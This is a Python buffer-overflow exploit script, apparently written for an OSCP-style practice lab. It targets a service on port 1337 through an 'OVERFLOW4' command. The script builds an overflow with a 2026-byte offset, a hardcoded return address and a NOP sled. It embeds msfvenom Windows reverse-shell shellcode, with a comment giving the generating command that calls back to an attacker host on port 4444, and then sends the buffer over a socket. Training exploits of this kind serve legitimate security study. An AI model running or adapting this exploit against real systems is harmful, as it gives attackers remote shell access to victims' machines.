import socket,sys

ip = sys.argv[1] if sys.argv[1] else "10.10.11.248"
port = 1337

prefix = b"OVERFLOW4 "
offset = 2026
overflow = b"A" * offset
# 625011AF
retn = b"\xAF\x11\x50\x62"
padding = b"\x90" * 16

# bad_chars = {0,0x23,0x3c,0x83,0xba}
#msfvenom -p windows/shell_reverse_tcp LHOST=10.9.1.54 LPORT=4444 EXITFUNC=thread -b "\x00\x40\x11\xB8\xEE\x5F" -f py -v payload -o shellcode.py
payload =  b""
payload += b"\xbf\xde\x3a\x4e\x04\xda\xc4\xd9\x74\x24\xf4\x5d"
payload += b"\x33\xc9\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\xa3"
payload += b"\x34\xac\xf1\xa7\xa1\xb2\xfa\x57\x32\xd3\x73\xb2"
payload += b"\x03\xd3\xe0\xb7\x34\xe3\x63\x95\xb8\x88\x26\x0d"
payload += b"\x4a\xfc\xee\x22\xfb\x4b\xc9\x0d\xfc\xe0\x29\x0c"
payload += b"\x7e\xfb\x7d\xee\xbf\x34\x70\xef\xf8\x29\x79\xbd"
payload += b"\x51\x25\x2c\x51\xd5\x73\xed\xda\xa5\x92\x75\x3f"
payload += b"\x7d\x94\x54\xee\xf5\xcf\x76\x11\xd9\x7b\x3f\x09"
payload += b"\x3e\x41\x89\xa2\xf4\x3d\x08\x62\xc5\xbe\xa7\x4b"
payload += b"\xe9\x4c\xb9\x8c\xce\xae\xcc\xe4\x2c\x52\xd7\x33"
payload += b"\x4e\x88\x52\xa7\xe8\x5b\xc4\x03\x08\x8f\x93\xc0"
payload += b"\x06\x64\xd7\x8e\x0a\x7b\x34\xa5\x37\xf0\xbb\x69"
payload += b"\xbe\x42\x98\xad\x9a\x11\x81\xf4\x46\xf7\xbe\xe6"
payload += b"\x28\xa8\x1a\x6d\xc4\xbd\x16\x2c\x81\x72\x1b\xce"
payload += b"\x51\x1d\x2c\xbd\x63\x82\x86\x29\xc8\x4b\x01\xae"
payload += b"\x2f\x66\xf5\x20\xce\x89\x06\x69\x15\xdd\x56\x01"
payload += b"\xbc\x5e\x3d\xd1\x41\x8b\x92\x81\xed\x64\x53\x71"
payload += b"\x4e\xd5\x3b\x9b\x41\x0a\x5b\xa4\x8b\x23\xf6\x5f"
payload += b"\x5c\x46\x0e\x5e\xaa\x3e\x12\x60\xc3\xe2\x9b\x86"
payload += b"\x89\x0a\xca\x11\x26\xb2\x57\xe9\xd7\x3b\x42\x94"
payload += b"\xd8\xb0\x61\x69\x96\x30\x0f\x79\x4f\xb1\x5a\x23"
payload += b"\xc6\xce\x70\x4b\x84\x5d\x1f\x8b\xc3\x7d\x88\xdc"
payload += b"\x84\xb0\xc1\x88\x38\xea\x7b\xae\xc0\x6a\x43\x6a"
payload += b"\x1f\x4f\x4a\x73\xd2\xeb\x68\x63\x2a\xf3\x34\xd7"
payload += b"\xe2\xa2\xe2\x81\x44\x1d\x45\x7b\x1f\xf2\x0f\xeb"
payload += b"\xe6\x38\x90\x6d\xe7\x14\x66\x91\x56\xc1\x3f\xae"
payload += b"\x57\x85\xb7\xd7\x85\x35\x37\x02\x0e\x55\xda\x86"
payload += b"\x7b\xfe\x43\x43\xc6\x63\x74\xbe\x05\x9a\xf7\x4a"
payload += b"\xf6\x59\xe7\x3f\xf3\x26\xaf\xac\x89\x37\x5a\xd2"
payload += b"\x3e\x37\x4f"




postfix = b""
# print('!mona bytearray -b "{}"\n!mona compare -f C:\\mona\\oscp\\bytearray.bin -a 0198FA30'.format("".join([ "\\x%0.2X" % c for c in bad_chars])))
buffer = prefix + overflow + retn + padding + payload + postfix
print("---")
try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)	
  s.connect((ip, port))
  # print("Sending evil buffer...")
  s.send(buffer + b"\r\n")
  print("Done!")
except Exception as e:
  print(e)
  print("Could not connect.")
